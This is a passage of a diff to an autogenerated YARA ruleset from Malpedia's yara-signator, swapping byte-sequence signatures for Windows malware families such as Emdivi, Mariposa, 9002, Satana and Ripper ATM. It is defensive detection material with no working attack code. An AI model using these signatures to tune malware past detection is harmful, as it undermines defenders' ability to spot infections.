"https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.ratankbapos_auto.yar#L1-L121" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sathurbot" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.sathurbot_auto.yar#L1-L134" license_url = "N/A" - logic_hash = "307bbc2928c4233a295ed19557340191e5f9ae029ac3d7d89bb25a026e5ae32e" + logic_hash = "3f29ba6959f8023f24a58bd7b1fb03852622ec3e610d203883720a7aae8ca8ad" score = 75 quality = 75 tags = "FILE" @@ -180042,32 +182818,32 @@ rule MALPEDIA_Win_Ratankbapos_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8d542444 56 52 e8???????? 8d44244c 83c424 33d2 } - $sequence_1 = { 83c424 33d2 8d7001 8d4900 8a08 40 3acb } - $sequence_2 = { 897304 8d7901 90 8a01 41 84c0 } - $sequence_3 = { 8b4b0c 03f0 c68405fcdfffff00 8d85fcdfffff 89b5f4dfffff c6040e00 } - $sequence_4 = { e8???????? 8b4510 33c9 8a4801 8d14cdd8ea0010 } - $sequence_5 = { ffb7c03d0110 ff15???????? 8987c03d0110 83c704 83ff28 72e6 5f } - $sequence_6 = { ff15???????? 83c41c 8bf0 ff15???????? 50 } - $sequence_7 = { 8b4dfc 33cd 83c408 b001 } - $sequence_8 = { b801000000 894588 8945a4 33c9 8bc2 c78574ffffff3c000000 } - $sequence_9 = { 8bc8 c1f905 8d3c8de04d0110 8bf0 } + $sequence_0 = { f6c101 0f94c0 813d????????0a000000 0f9cc1 08c1 b86b2c1f0a b9b2fd990f } + $sequence_1 = { b94d1e0277 0f45c1 e9???????? 3ddc03f324 0f8582f1ffff a1???????? 8d48ff } + $sequence_2 = { e9???????? 81ff6e65f902 7f1b 81ffded97800 ba96b0469a 0f8548e7ffff bfadab28bf } + $sequence_3 = { e9???????? b817aff9fc e9???????? 3dcf25ea47 0f85eef0ffff a1???????? 8d48ff } + $sequence_4 = { f6c101 0f94c0 813d????????0a000000 0f9cc1 08c1 b8d3b4c9a9 b9c79b14fb } + $sequence_5 = { c744240400000000 89f1 e8???????? 83ec0c bafb0541ae b828f7da39 eb8f } + $sequence_6 = { b994a742ce 0f45c1 e9???????? 3d98320e47 0f8561fcffff 8a45ea 8a4deb } + $sequence_7 = { f6c201 ba67157693 b85ee72ce5 0f45d0 e9???????? 3d4c9cd69e 89c2 } + $sequence_8 = { e8???????? 83ec0c 8b45f0 8945d8 894610 89f1 e8???????? } + $sequence_9 = { bf51a32250 81fa39ccdcb8 74d7 ebfe 8b4304 83ec04 890424 } condition: - 7 of them and filesize <327680 + 7 of them and filesize <2727936 } -rule MALPEDIA_Win_Chairsmack_Auto : FILE +rule MALPEDIA_Win_Dmsniff_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "89ef8364-1d04-5ec8-8eb0-0caa1f808e4e" + id = "16f341e6-77a3-5816-ba96-baf125c04244" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.chairsmack" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.chairsmack_auto.yar#L1-L132" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dmsniff" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.dmsniff_auto.yar#L1-L124" license_url = "N/A" - logic_hash = "30e742a004c4313020160ca17f15835b780b5f554d2c7d95b7655ea180005855" + logic_hash = "97dafc3ba62eb5e1ea05a655f64eed9d043aae4b3733a53f196189f18ab4ea03" score = 75 quality = 75 tags = "FILE" @@ -180081,32 +182857,32 @@ rule MALPEDIA_Win_Chairsmack_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8d8c2410010000 c68424840300003a e8???????? 83ec1c 8d842428010000 8bcc 8964242c } - $sequence_1 = { 8d4de8 56 c745fc01000000 e8???????? 8b7df0 8d4de8 2b7e08 } - $sequence_2 = { 8d4c2464 e8???????? e9???????? 68???????? 8d8c24bc000000 e8???????? 8bd0 } - $sequence_3 = { 8b4004 eb03 83c004 51 50 ffb4249c000000 51 } - $sequence_4 = { 660f57c4 8b7c2414 8d442421 c644242025 8b5714 f6c220 7409 } - $sequence_5 = { 7613 b8feffff7f 8d3419 2bc1 3bd8 7605 befeffff7f } - $sequence_6 = { 8d8db8fcffff e9???????? 8d8dd0fdffff e9???????? 8d8dbcfcffff e9???????? 8d8dc0fdffff } - $sequence_7 = { c68424b8030000b9 8bcc 68???????? e8???????? c68424b8030000b6 e8???????? 83c430 } - $sequence_8 = { 8b148dd06d4a00 81c200080000 3955e4 7366 8b45e4 c6400400 8b4de4 } - $sequence_9 = { 0fbe02 85c0 0f848e010000 8b4dfc 51 } + $sequence_0 = { 83c661 89f3 881d???????? 8d04bf } + $sequence_1 = { 50 d93c24 66810c240003 d92c24 83c404 6a00 6a00 } + $sequence_2 = { 53 56 57 8b5d0c 8b7510 } + $sequence_3 = { 89fe 46 89b5fcfeffff 899cbd00ffffff 8d85f0feffff 50 6a00 } + $sequence_4 = { eb15 47 39f7 72d3 ff45fc 8b45f4 3945fc } + $sequence_5 = { 56 57 8965e8 50 d93c24 } + $sequence_6 = { eb18 68???????? e8???????? 50 68???????? e8???????? 83c40c } + $sequence_7 = { e8???????? 50 68???????? e8???????? 83c40c eb18 } + $sequence_8 = { e8???????? 83c40c eb18 68???????? e8???????? 50 } + $sequence_9 = { 7316 8bbdfcfeffff 89fe 46 89b5fcfeffff 899cbd00ffffff } condition: - 7 of them and filesize <1974272 + 7 of them and filesize <131072 } -rule MALPEDIA_Win_Monero_Miner_Auto : FILE +rule MALPEDIA_Win_8T_Dropper_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "e4c7050e-9186-5f1e-9d47-976e6a4001a0" + id = "62f20b6c-23f8-52e5-8f38-7d977c3fc023" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.monero_miner" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.monero_miner_auto.yar#L1-L134" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.8t_dropper" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.8t_dropper_auto.yar#L1-L115" license_url = "N/A" - logic_hash = "7e4796fa5a31551e9b057737783d58401a472a7bae7889a290c988c1aea0c1dd" + logic_hash = "f24ad3d6bfd5a20c8c809ac43affb0600d938cb9b1cb9cd8c47771e603e82a25" score = 75 quality = 75 tags = "FILE" @@ -180120,32 +182896,32 @@ rule MALPEDIA_Win_Monero_Miner_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 0fb65508 034d04 035d00 01d0 e9???????? 0fb77508 034d04 } - $sequence_1 = { 8b842490000000 895f40 338424ac000000 8b9c2444010000 31cd 8b8c2440010000 31de } - $sequence_2 = { 8b442460 31f5 8bb42488000000 03742460 896c2438 89c5 897c243c } - $sequence_3 = { 8b4c2424 c7042400000000 89442404 8b442420 e8???????? 85c0 89c3 } - $sequence_4 = { 8b54245c 09ce 89b424f0010000 897738 89ac24f4010000 896f3c 0fa4c204 } - $sequence_5 = { 8d4c2427 89742414 895c240c 897c2408 c744240400000000 83e1f0 8b7de0 } - $sequence_6 = { 89bc24c0010000 89ac24c4010000 8bac24c8040000 036c2420 8b742460 8bbc24cc040000 137c2424 } - $sequence_7 = { c744240423000000 8b85c0040000 890424 e8???????? 85c0 7403 c60000 } - $sequence_8 = { e8???????? 8d4b50 8d5705 c7435c00000000 c7435800000000 c7435400000000 895350 } - $sequence_9 = { 8b8424b0010000 899424c4010000 8b9424b4010000 89ac24c0010000 01c1 89c5 11d3 } + $sequence_0 = { 741b 56 6800700000 6a01 68???????? } + $sequence_1 = { ff74240c e8???????? 83c40c c3 8b442408 83f801 } + $sequence_2 = { c6440c0e6e 8d4c2408 51 683f000f00 50 } + $sequence_3 = { 68???????? 50 ff15???????? 85c0 7559 8b4c2408 51 } + $sequence_4 = { 50 ff15???????? 85c0 7559 8b4c2408 } + $sequence_5 = { 49 c6440c0c52 c6440c0d75 c6440c0e6e } + $sequence_6 = { 68???????? 6a02 50 8b442418 } + $sequence_7 = { 7559 8b4c2408 51 ff15???????? } + $sequence_8 = { 6800700000 6a01 68???????? e8???????? 56 e8???????? } + $sequence_9 = { ff15???????? 8d942410010000 6804010000 52 68???????? } condition: - 7 of them and filesize <1425408 + 7 of them and filesize <147456 } -rule MALPEDIA_Win_Ehdevel_Auto : FILE +rule MALPEDIA_Win_Emdivi_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "df8239a0-64d7-5d90-a037-26c4b02b8a9b" + id = "c7c959fb-e496-5370-834c-2f119e1d6751" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ehdevel" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.ehdevel_auto.yar#L1-L129" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.emdivi" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.emdivi_auto.yar#L1-L118" license_url = "N/A" - logic_hash = "959b6347dd7f394fa1dd74e2d5d70bd613b6731b1cc6dbc8f1a7abb3467a3ebd" + logic_hash = "e1fc98ee3cf386dcf808c43ff2c4f0b6085fa811a19f892f7791e8e62f91b120" score = 75 quality = 75 tags = "FILE" @@ -180159,34 +182935,34 @@ rule MALPEDIA_Win_Ehdevel_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 51 e8???????? e9???????? 33d2 68fe070000 52 8d85feefffff } - $sequence_1 = { 7545 56 c70303000000 ff15???????? 56 ff15???????? 68???????? } - $sequence_2 = { 8d8dcce7ffff 51 6a00 6813000020 56 c785cce7ffff00000000 c785c8e7ffff04000000 } - $sequence_3 = { 8d85f0e7ffff 50 56 6a00 6a10 6a02 ff15???????? } - $sequence_4 = { e8???????? 83c404 33c9 6a08 b8???????? } - $sequence_5 = { 8d8dd4e5ffff 51 8d95f8f7ffff 6800040000 52 e8???????? } - $sequence_6 = { 83c410 8b4d0c 8d442408 50 51 } - $sequence_7 = { 83d8ff 85c0 0f84cffdffff 68???????? 6800040000 57 e8???????? } - $sequence_8 = { 50 e8???????? 8d8c24d4190000 51 8d9424d8010000 6800040000 52 } - $sequence_9 = { 8db564f7ffff e8???????? 33d2 899de8f7ffff 89bde4f7ffff 668995d4f7ffff 33c0 } + $sequence_0 = { 0fbe441fff 83c404 2bd8 8bf3 8d4601 } + $sequence_1 = { 59 c745e401000000 c745e803000000 c745ec05000000 894df0 c745f408000000 c745f80a000000 } + $sequence_2 = { c645f800 e8???????? 8b45d4 5b 8b4dfc 33cd 5f } + $sequence_3 = { ff5108 e8???????? c3 beff010000 56 } + $sequence_4 = { ff750c 8365e000 ff7508 33c0 c645e400 8d7de5 } + $sequence_5 = { 5f c9 c3 6a1f } + $sequence_6 = { eb07 888415b4fdffff 42 41 41 } + $sequence_7 = { 8bf0 e8???????? 99 2bf7 f7fe } + $sequence_8 = { 55 8bec 53 56 6a03 5b } + $sequence_9 = { 83e003 33d2 3955f0 8945f8 } condition: - 7 of them and filesize <524288 + 7 of them and filesize <581632 } -rule MALPEDIA_Win_Termite_Auto : FILE +rule MALPEDIA_Win_9002_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "f52e0f9c-00a2-57d7-aba9-0dbbb1d1c2e2" + id = "49e80af5-ef9d-5bf8-b3b9-b7af1f356471" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.termite" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.termite_auto.yar#L1-L131" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.9002" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.9002_auto.yar#L1-L290" license_url = "N/A" - logic_hash = "cc787c4fe1eac82cec1ddbf65768a64c7a8c2c3d8dd4b766767f73077448495f" + logic_hash = "9d293b5dc33eac56c2e3f0cda3054624c24835d742e33a63df2c2aa725e52d40" score = 75 - quality = 75 + quality = 73 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -180198,32 +182974,53 @@ rule MALPEDIA_Win_Termite_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8b4508 c1e003 89c2 c1e206 01d0 05???????? 8d5004 } - $sequence_1 = { e8???????? c744240814000000 8d45dc 89442404 8b45f4 890424 } - $sequence_2 = { c744241cffffffff c74424188cd44000 c7442414ffffffff 8b4510 89442410 8b450c 8944240c } - $sequence_3 = { 837dfc00 75d7 b800000000 c9 c3 55 } - $sequence_4 = { 8b10 a1???????? 8b4d08 894c2408 89542404 890424 e8???????? } - $sequence_5 = { e8???????? 83f814 7706 837d1400 7f0a b8ffffffff } - $sequence_6 = { 837d0c00 750a b800000000 e9???????? 8b450c 8b4010 8945f0 } - $sequence_7 = { 89442404 8b45f0 890424 e8???????? c70424???????? e8???????? 8b45f4 } - $sequence_8 = { c704240a000000 e8???????? eb0a c745f401000000 eb08 90 c745f400000000 } - $sequence_9 = { 83ec04 89442404 8d85b4feffff 890424 e8???????? 8d85b4feffff 89442404 } + $sequence_0 = { 7514 8b4714 8b08 51 e8???????? 8b5714 } + $sequence_1 = { 51 8944241c c744241801000000 ff15???????? 3d02010000 } + $sequence_2 = { 7504 33ed eb04 2bc8 } + $sequence_3 = { 8bd1 2bd0 3bda 7223 } + $sequence_4 = { 6a02 ff15???????? 68???????? ff15???????? 6a00 } + $sequence_5 = { 8b5c2408 6bdb08 03c3 8b00 } + $sequence_6 = { 33c9 3bc8 1bd2 f7da 8915???????? } + $sequence_7 = { 03c3 8b00 5b ffd0 8945fc } + $sequence_8 = { 51 e8???????? 6a06 6a01 6a02 e8???????? } + $sequence_9 = { 8be9 53 50 e8???????? } + $sequence_10 = { 7504 33d2 eb05 8b5608 2bd0 3bfa } + $sequence_11 = { 682c010000 50 ffd3 3d02010000 7508 } + $sequence_12 = { 6a00 6a02 6a03 6a00 e8???????? } + $sequence_13 = { 75f6 eb2f 8b542430 8b7c2414 8b6c2430 } + $sequence_14 = { 668b3c59 730d 33c9 8a0a } + $sequence_15 = { 59 8b0485e0d50010 8d0cf6 8064880400 85ff } + $sequence_16 = { 0311 8955fc 837df800 0f86e3000000 8b4508 03450c 2b45f8 } + $sequence_17 = { 68???????? 8d4610 50 8d4c2418 51 ff15???????? } + $sequence_18 = { 896f2c 8b4748 3bc5 740c 50 } + $sequence_19 = { 8d4c240c c644243002 ff15???????? 8bc6 } + $sequence_20 = { 6a00 8bd8 51 57 53 } + $sequence_21 = { 8b4c242c 5f 89411c 8b442410 895118 8b542434 894124 } + $sequence_22 = { 33c4 50 8d442428 64a300000000 8bf1 89742408 68???????? } + $sequence_23 = { 8939 89742410 e9???????? 33f6 83ff14 } + $sequence_24 = { 0fb74e08 0fafcf 5f 03c1 5e } + $sequence_25 = { 031481 52 8b450c 50 } + $sequence_26 = { 5d 83c410 c3 8b4508 85c0 7499 } + $sequence_27 = { 2bc5 c1ef05 2bcf 2bf5 66898c5a98010000 33c9 } + $sequence_28 = { 64a300000000 8b7c2444 8bf1 33db 57 8d4e10 89742414 } + $sequence_29 = { 8b742408 57 85f6 742e 0fb74602 8b7c2410 3bf8 } + $sequence_30 = { 8b5c2424 3bcb 0f83f6040000 33db } condition: - 7 of them and filesize <312320 + 7 of them and filesize <204800 } -rule MALPEDIA_Win_Proto8_Rat_Auto : FILE +rule MALPEDIA_Win_Mariposa_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "67c17406-b8bd-51d3-bd06-6c282d2d9ba4" + id = "2a3a2192-1985-5afb-a3c8-457f3f4c729c" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.proto8_rat" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.proto8_rat_auto.yar#L1-L134" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mariposa" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.mariposa_auto.yar#L1-L118" license_url = "N/A" - logic_hash = "b74b2b80c633a7bf227b4dcb10a54e0eaa49fb3d590fb7e951e6a918637cc88c" + logic_hash = "343ac33f57cd9cc9bfc1841bf1bd211734de245f417ee554220587a46ed4086f" score = 75 quality = 75 tags = "FILE" @@ -180237,32 +183034,32 @@ rule MALPEDIA_Win_Proto8_Rat_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 7819 8d4a01 0f1f00 488b5b08 4883e901 75f6 eb07 } - $sequence_1 = { f04e0fb13409 483bd0 752b 4885d2 7426 440fb68c24c8000000 498bcc } - $sequence_2 = { 488b4008 48894708 488b4630 488907 488b4630 488b4808 488939 } - $sequence_3 = { 764f 6666660f1f840000000000 458bc1 8bd5 49c1e006 4c034360 4183780800 } - $sequence_4 = { 0f10442428 488b842488000000 0f1100 f20f104c2438 f20f114810 b001 eb02 } - $sequence_5 = { e8???????? 84c0 751d 488b03 488bcb ff5018 488bf0 } - $sequence_6 = { 4053 4883ec20 488d05634f0400 488bd9 488901 f6c201 740a } - $sequence_7 = { f20f114808 0f28cf 488b41e0 f20f594020 f20f114008 488b41e8 f20f594820 } - $sequence_8 = { ff15???????? 85c0 757f ff15???????? 3d002f0000 74be 488b4c2440 } - $sequence_9 = { 8b842490000000 03ce 894c2428 3bc8 0f829afdffff 4c8b7c2440 4c8b642448 } + $sequence_0 = { 55 8bec 53 56 bb???????? 43 } + $sequence_1 = { ffd3 33c0 50 e8???????? 33c0 } + $sequence_2 = { 53 56 bb???????? 43 } + $sequence_3 = { 885c0cff e2f1 ba???????? 2bd6 8bdc 03da 4b } + $sequence_4 = { 8a1c0e 02d8 32dc fec0 885c0cff e2f1 } + $sequence_5 = { 8bdc 03da 4b 54 ffd3 33c0 } + $sequence_6 = { 885c0cff e2f1 ba???????? 2bd6 } + $sequence_7 = { 8a4301 8a6302 f6d0 02c4 d0f8 8a1c0e } + $sequence_8 = { 53 56 bb???????? 43 803b00 } + $sequence_9 = { 03da 4b 54 ffd3 33c0 } condition: - 7 of them and filesize <2537472 + 7 of them and filesize <311296 } -rule MALPEDIA_Win_Nitlove_Auto : FILE +rule MALPEDIA_Win_Chinotto_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "b00aecde-2bc6-57bb-930b-a202a51e31ba" + id = "eb163619-c453-5aad-acb2-63f8cb2fc096" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nitlove" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.nitlove_auto.yar#L1-L116" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.chinotto" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.chinotto_auto.yar#L1-L127" license_url = "N/A" - logic_hash = "702803544b3494bdcd3ba717ae94381060ca7fe1c8bd808ab3cc38c9aa80bcd5" + logic_hash = "68ff4e71579a9ee7d4f8a0767737ed2f326ba91b5ade5aa40e96479fa8db4fb8" score = 75 quality = 75 tags = "FILE" @@ -180276,32 +183073,32 @@ rule MALPEDIA_Win_Nitlove_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8d85c4feffff b902000080 66a5 be???????? 8d7df8 50 8d45f8 } - $sequence_1 = { ff15???????? 85c0 74e1 837dfcff } - $sequence_2 = { ffd7 8b75f4 8b4df8 8b859cfaffff 8b95a0faffff 83c010 } - $sequence_3 = { 0f853d010000 6a00 56 baf3b33d04 } - $sequence_4 = { 8945d8 8b4508 8945c0 8b450c } - $sequence_5 = { e8???????? ffd0 bab2bb282b b9???????? } - $sequence_6 = { ba7f22fb0e b9???????? e8???????? ffd0 } - $sequence_7 = { 8bcb e8???????? ffd0 ff75fc ba07d457d6 8bcb } - $sequence_8 = { 0f84aa000000 53 56 57 e8???????? e8???????? 8d45f8 } - $sequence_9 = { ffd0 8b4dfc 6a00 8904b1 b9???????? 837dec00 } + $sequence_0 = { 034d0c 53 56 57 8b7848 8b774c } + $sequence_1 = { 6a1a e8???????? 8bd8 b906000000 be???????? 8bfb f3a5 } + $sequence_2 = { c745f800000000 8955c8 85d2 7505 ba02000000 8b461c 8bf8 } + $sequence_3 = { 57 8945f0 8d5801 740e 8b4e1c 2b4e40 } + $sequence_4 = { 837dfc00 7514 837dd000 0f8421080000 837e2000 0f8417080000 } + $sequence_5 = { 8d8dd0fbffff 68???????? 51 ffd6 83c418 8d95a4f1ffff 52 } + $sequence_6 = { 8b5620 57 8b7e24 8bc2 0bc7 7412 8bc2 } + $sequence_7 = { 8a08 40 84c9 75f9 2bc7 8b7d18 } + $sequence_8 = { 83c434 5f 5e 33cd 8d85e0fdfcff 5b } + $sequence_9 = { 8b471c 50 0fafc1 034710 8d55f8 } condition: - 7 of them and filesize <49152 + 7 of them and filesize <300032 } -rule MALPEDIA_Win_Tclient_Auto : FILE +rule MALPEDIA_Win_Chewbacca_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "f2038e8d-aea1-548a-a845-014bf9e62586" + id = "222f6780-8c77-5a93-9b3a-f1a76242c8a5" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tclient" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.tclient_auto.yar#L1-L133" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.chewbacca" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.chewbacca_auto.yar#L1-L95" license_url = "N/A" - logic_hash = "d731098e1e4af77da640d6018efa5a27e1199a8bfd1426735ef45625c1645468" + logic_hash = "026e724d28dad06de27f1ece049f17b6c66ca8975467e2769de70691ea3bc834" score = 75 quality = 75 tags = "FILE" @@ -180315,32 +183112,30 @@ rule MALPEDIA_Win_Tclient_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8be5 5d c21800 b8???????? e8???????? 83ec70 53 } - $sequence_1 = { 6685f6 7411 0fb7c2 42 885c0804 0fb7c2 42 } - $sequence_2 = { e9???????? 6a44 8d442444 53 50 e8???????? 33c0 } - $sequence_3 = { 50 8d0419 57 50 e8???????? 83c40c b880000000 } - $sequence_4 = { 894db0 2345a8 33c2 c1c105 034e28 81c29979825a 8b75a8 } - $sequence_5 = { 8b00 2bc1 8d4a01 3bc1 0f4cc8 894dec 85c9 } - $sequence_6 = { 59 59 85c0 7443 e9???????? 85f6 741e } - $sequence_7 = { 57 e8???????? 8b4304 2b4508 50 ff7508 } - $sequence_8 = { 6bc930 8b0495c0a04700 c644012801 8b0495c0a04700 897c0118 8bfe e9???????? } - $sequence_9 = { 89bebc010000 8a8398000000 888675030000 0fb68398000000 50 8d4366 50 } + $sequence_0 = { e8???????? c645f401 8a45f4 5b c9 } + $sequence_1 = { e8???????? c645c800 8b45cc 8b10 } + $sequence_2 = { e8???????? c645f000 8b45f4 8b80b4010000 } + $sequence_3 = { e8???????? c645a400 c645f400 806df401 } + $sequence_4 = { e8???????? c645d001 8a45d0 5f } + $sequence_5 = { e8???????? c645ec01 e9???????? 8b55dc } + $sequence_6 = { e8???????? c645f401 e8???????? 8d4590 e8???????? 58 } + $sequence_7 = { e8???????? c645a400 6a00 8b45f8 8b00 898554ffffff } condition: - 7 of them and filesize <1063936 + 7 of them and filesize <9764864 } -rule MALPEDIA_Win_Scanpos_Auto : FILE +rule MALPEDIA_Win_Satana_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "8293fa8e-4228-517c-a26a-04301bca2110" + id = "d19234af-c9bd-5654-81eb-f961478057fe" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.scanpos" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.scanpos_auto.yar#L1-L120" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.satana" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.satana_auto.yar#L1-L122" license_url = "N/A" - logic_hash = "b005df89a44c0f26903a8ba8f3d418d77b4a13957700f79b1d7571fcff516771" + logic_hash = "bdc48675727bdd579a6ca8ed3a223cef8d8ab6026da5d019b40d5fe8d696eb85" score = 75 quality = 75 tags = "FILE" @@ -180354,32 +183149,32 @@ rule MALPEDIA_Win_Scanpos_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { c645b800 e8???????? c645fc01 837de810 8b45d4 } - $sequence_1 = { c745d830124100 e8???????? 8b4508 8b4dec 8945e4 40 } - $sequence_2 = { 52 57 8bfe 8d75d4 e8???????? be10000000 c645fc00 } - $sequence_3 = { 80f939 0f8fd3010000 80f930 0f8cca010000 0fbec0 0fbec9 8d848010ffffff } - $sequence_4 = { 7f04 3bcb 7611 8945d8 } - $sequence_5 = { 8b4dac c745cc0f000000 c745c800000000 c645b800 e8???????? c645fc01 } - $sequence_6 = { 50 8d4d80 e8???????? 83c40c 57 } - $sequence_7 = { 84db 7507 6a01 e8???????? 8d8de8feffff } - $sequence_8 = { 57 8d8dcbfeffff 51 6804010000 } - $sequence_9 = { 2bc1 8bcf 03c3 83cfff 2bf8 3bf9 730a } + $sequence_0 = { 8b3d???????? 90 ffd6 68e8030000 ffd7 } + $sequence_1 = { ff15???????? 8b459c 50 ff15???????? 8b4ddc 010d???????? } + $sequence_2 = { 8d8c2468020000 51 e8???????? 8b442410 8d542418 52 } + $sequence_3 = { 8b5108 ffd2 6a00 8b45fc 8b480c ffd1 8be5 } + $sequence_4 = { 68???????? e8???????? 83c414 53 6880000000 } + $sequence_5 = { 83c002 663bcb 75f1 8d8de89effff 51 e8???????? } + $sequence_6 = { 57 50 68???????? e8???????? 83c414 833d????????00 745a } + $sequence_7 = { ffd3 8bf8 a1???????? 57 } + $sequence_8 = { 105353 bf60600157 ff7528 fc ffd6 0105???????? f8 } + $sequence_9 = { ff15???????? e8???????? 837de401 0f8e12030000 8b4704 } condition: - 7 of them and filesize <229376 + 7 of them and filesize <221184 } -rule MALPEDIA_Win_Bid_Ransomware_Auto : FILE +rule MALPEDIA_Win_Ripper_Atm_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "123f6d77-eca2-5400-ac56-e3f30e76b796" + id = "a163a628-88ff-5ee3-8ab0-3e7869e5ed11" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bid_ransomware" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.bid_ransomware_auto.yar#L1-L114" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ripper_atm" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.ripper_atm_auto.yar#L1-L131" license_url = "N/A" - logic_hash = "040b1903110ce367e4f39e634882ebba58d8e30bf0983ec0eaeaeca56a956f74" + logic_hash = "30a8a446c0211fbfa8563685de5143789e29b7c89e693b370c3a643209d252a9" score = 75 quality = 75 tags = "FILE" @@ -180393,32 +183188,32 @@ rule MALPEDIA_Win_Bid_Ransomware_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { c705????????20202020 68???????? 50 e8???????? } - $sequence_1 = { 6a00 e8???????? ff75fc e8???????? c9 c3 } - $sequence_2 = { ff75b0 e8???????? ff75b0 e8???????? 6800800000 ff75a8 } - $sequence_3 = { 55 8bec 83c4f4 6800800000 6a40 } - $sequence_4 = { 881f 83c701 83f800 77e3 eb0e } - $sequence_5 = { 8b4d08 80c141 c745c05c5c3f5c 884dc4 c745c53a5c2a2e } - $sequence_6 = { 53 6a00 6a00 6a00 ff75e4 e8???????? } - $sequence_7 = { 8945f0 eb15 ff75f4 e8???????? } - $sequence_8 = { 68ea030000 ff35???????? e8???????? 8945fc } - $sequence_9 = { e8???????? 8b85acfdffff 83e001 7414 8b7508 } + $sequence_0 = { 8b7d08 2175fc 397714 7e2a ff770c 8b33 8bcb } + $sequence_1 = { 0f434dd8 837dd408 8d5598 52 8d9550ffffff 52 } + $sequence_2 = { 3938 8b45ec 7408 8b4de8 3b4810 7327 8b4e08 } + $sequence_3 = { 6a0f 50 ff15???????? 85c0 7402 32c0 